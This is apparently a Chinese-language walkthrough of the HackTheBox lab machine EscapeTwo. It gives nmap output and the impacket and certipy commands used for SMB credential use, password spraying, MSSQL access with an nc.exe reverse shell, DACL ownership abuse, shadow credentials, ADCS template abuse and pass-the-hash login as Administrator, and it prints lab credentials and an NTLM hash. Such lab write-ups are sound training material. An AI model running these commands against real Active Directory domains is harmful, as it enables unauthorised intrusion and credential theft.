信息收集

nmap -sV -sC -O 10.10.11.51

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 14:52 CST

Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan

Service scan Timing: About 69.23% done; ETC: 14:54 (0:00:06 remaining)

Nmap scan report for 10.10.11.51

Host is up (0.64s latency).

Not shown: 987 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION

53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 06:34:49Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:44+00:00; -19m04s from scanner time.

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

|_ssl-date: 2025-04-05T06:36:43+00:00; -19m02s from scanner time.

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM

| ms-sql-info:

|   10.10.11.51:1433:

|     Version:

|       name: Microsoft SQL Server 2019 RTM

|       number: 15.00.2000.00

|       Product: Microsoft SQL Server 2019

|       Service pack level: RTM

|       Post-SP patches applied: false

|_    TCP port: 1433

| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback

| Not valid before: 2025-04-04T19:43:03

|_Not valid after:  2055-04-04T19:43:03

|_ssl-date: 2025-04-05T06:36:45+00:00; -19m04s from scanner time.

| ms-sql-ntlm-info:

|   10.10.11.51:1433:

|     Target_Name: SEQUEL

|     NetBIOS_Domain_Name: SEQUEL

|     NetBIOS_Computer_Name: DC01

|     DNS_Domain_Name: sequel.htb

|     DNS_Computer_Name: DC01.sequel.htb

|     DNS_Tree_Name: sequel.htb

|_    Product_Version: 10.0.17763

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:46+00:00; -19m03s from scanner time.

3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:43+00:00; -19m04s from scanner time.

5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running (JUST GUESSING): Microsoft Windows 2019|10 (91%)

OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10

Aggressive OS guesses: Windows Server 2019 (91%), Microsoft Windows 10 1903 - 21H1 (85%)

No exact OS matches for host (test conditions non-ideal).

Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-time:

|   date: 2025-04-05T06:36:08

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

|_clock-skew: mean: -19m03s, deviation: 1s, median: -19m03s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 189.83 seconds

smb攻击

题目描述给了个账号密码:rose:KxEPkKe6R8su,smbclient连接一下,impacket-smbclient sequel/rose:KxEPkKe6R8su@10.10.11.51



下载excel,010修改一下文件头,504B0304,修复成功打开,拿到用户名密码,做一个密码本

KxEPkKe6R8su

0fwz7Q4mSpurIt99

86LxLBMgEWaKUnBG

Md9Wlq1E5bZnVDVo

MSSQLP@ssw0rd!

用户名怕不全,smb爆一下用户名



做一个用户表

Administrator

Guest

krbtgt

DC01$

michael

ryan

oscar

sql_svc

rose

ca_svc

也可以ldap来收集用户名



大差不差,smb密码喷洒一下



获得新凭证:oscar:86LxLBMgEWaKUnBG,测试winrm连不上,切换思路,之前发现的excel表中有这一组账号密码:sa:MSSQLP@ssw0rd!,nmap也扫出了1433端口有mssql,登录一下,impacket-mssqlclient sequel/sa:'MSSQLP@ssw0rd!'@10.10.11.51



测试发现有128长度限制,那传个nc.exe上去,反连



发现新凭证:sql_svc:WqSZAF6CysDQbGb3,使用这个密码去喷洒一下



获得新凭证:ryan:WqSZAF6CysDQbGb3,winrm连一下



使用bloodhound收集一下域信息,不过首先得同步一下与目标的时间,使用faketime伪造一下



上传到GUI中,直接分析ryan用户的关系网

DACL攻击

ryan用户对ca_svc用户有writeownerer权限,先将ca_svc的所有者修改成ryan

impacket-owneredit -action write -new-owner ryan -target ca_svc -dc-ip 10.10.11.51 sequel/ryan:WqSZAF6CysDQbGb3



在利用dacl将ryan的权限修改成FullControl

impacket-dacledit -action write -rights FullControl -target ca_svc -principal ryan -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysDQbGb3



注意以上两步需要连贯快速的执行,不然第二步可能会失败

Shadow Credentials Attack (ESC4)

ESC4 滥用 Active Directory 帐户的密钥凭据属性,允许攻击者使用基于证书的身份验证绕过以其他用户身份进行身份验证。

通过ca_svc所属用户组Cert Publishersc猜测的攻击思路......正常人能想到吗?此攻击将向 ca_svc 添加恶意密钥凭证,并允许 Ryan 使用证书而不是密码以 ca_svc 的身份进行身份验证,其实就是可以获取ca_svc的NTLM HASH凭证

certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -dc-ip 10.10.11.51



这里注意都要faketime一下,要不然获取TGT会失败,这里找证书漏洞模板

certipy-ad find -u 'ca_svc' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -target 10.10.11.51 -stdout -vulnerable



使用这个模板可以以管理员身份请求dc,先修改一下模板

certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug



再请求Administrator获取证书



使用该证书去请求拿到Administrator的hash

certipy-ad auth -pfx administrator.pfx -ns 10.10.11.51 -debug



winrm登录管理员

evil-winrm -i 10.10.11.51 -u Administrator -H ?????????????

拿到flag

HTB打靶记录-EscapeTwo的更多相关文章

  1. VulnHub-Earth 打靶记录

    目录 VulnHub-Earth 打靶记录 知识点 目标探测 信息收集 Shell反弹&信息二次收集 提权 权限维持 VulnHub-Earth 打靶记录 搭建靶场的时候一定要使用NATser ...

  2. 【HTB系列】靶机Chaos的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...

  3. CSS3中的动画效果记录

    今天要记录的是CSS3中的三种属性transform.transition以及animation,这三个属性大大提升了css处理动画的能力. 一.Transform 变形 CSS中transform ...

  4. 利用jdk中工具完成Java程序监控方法记录

    转载加自己整理的部分内容,转载自:http://jiajun.iteye.com/blog/810150 记录下JConsole使用方法 一.JConsole是什么    从Java 5开始 引入了 ...

  5. 递归计算战士打靶S次打了N环一共同拥有多少种可能的问题

    问题描写叙述 一个战士打了10次靶.一共打了90环,问一共同拥有多少种可能,并输出这些可能的组合. 思路 首先.嵌套10层循环进行穷举是不可取的,一是由于速度太慢,二是假设改成打20次靶就完蛋了. 事 ...

  6. RAR 5.50 控制台使用记录

    copy from  WinRAR用户手册,备忘 用户手册 ~~~~~~~~ RAR 5.50 控制台版本 ~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=- ...

  7. 【HTB系列】靶机Frolic的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...

  8. 打靶笔记-03-vulhub-Moriarty Corp

    打靶笔记-03-vulhub-BoredHackerBlog 一.靶机信息 Name: BoredHackerBlog: Moriarty Corp(中-高级难度) Date release: 29 ...

  9. 打靶笔记-01-vulnhub-moneybox

    打靶笔记-01-vulnhub-moneybox 本篇笔记根据苑老师视频进行学习记录 https://www.bilibili.com/video/BV1Lv411n7Lq/?spm_id_from= ...

  10. webug4.0 打靶笔记-02【完结】

    webug4.0打靶笔记-02 3. 延时注入(时间盲注) 3.1 访问靶场 3.2 寻找注入点 貌似一样的注入点: ?id=1' --+ 3.3 判断输出位置 同前两关一样的位置,时间盲注应该不是这 ...

随机推荐

  1. w3cschool-OpenResty 最佳实践

    https://www.w3cschool.cn/openresty1/ OpenResty 简介 OpenResty(也称为 ngx_openresty)是一个全功能的 Web 应用服务器.它打包了 ...

  2. 【TCP协议】---协议详解

    TCP协议 本文内容如下:      1)TCP协议概念      2)TCP头部结构和字段介绍      3)TCP流量控制            滑动窗口      4)TCP拥塞控制      ...

  3. JVM虚拟机---常用JVM配置参数

    常用JVM配置参数 常用JVM配置参数主要有:Trace跟踪参数.堆的分配参数.栈的分配参数. 一.Trace跟踪参数 跟踪参数用于跟踪监控JVM,对于开发人员来讲用于JVM调优以及故障排查的. 1. ...

  4. Docker问题日志--工作中遇到的问题及解决

    启动Docker容器时遇到错误 标签: docker, docker run, docker start, 环境: Docker version 1.12.6, build 1398f24/1.12. ...

  5. Volar Vetur 在 VSCode 里的配置

    VSCode 对 vue2 vue3 项目如何配置 1. 在 vscode 安装 vetur.Vue - Official(之前叫 Volar) 两个插件 2.你若是 vue3 项目,直接在你项目工作 ...

  6. flutter真机调试出现flutter Launching 'app' on No Devices.

    1. flutter真机调试出现flutter Launching 'app' on No Devices. flutter Launching 'app' on No Devices. 我的是华为手 ...

  7. windows jdk环境变量配置

    新建环境变量[classpath]变量值为[.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar] 新建环境变量[JAVA_HOME]变量值为jdk的安装目录 如:[ ...

  8. flutter-TextField垂直居中

    decoration: InputDecoration( contentPadding: EdgeInsets.symmetric(vertical: 0), // border: InputBord ...

  9. CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比

    CSnakes 是一个用于在.NET项目中嵌入Python代码的工具,由.NET源生成器和运行时组成,能够实现高效的跨语言调用,Github:https://github.com/tonybalone ...

  10. ABC393F题解

    大概评级:绿. 一看到这种题目,就知道肯定是数据结构题,我们首先用一个众所周知的二分来求出 \(pos\) 数组,\(pos_i\) 表示以 \(i\) 结尾的最长上升子序列的大小,然后将询问离线,弄 ...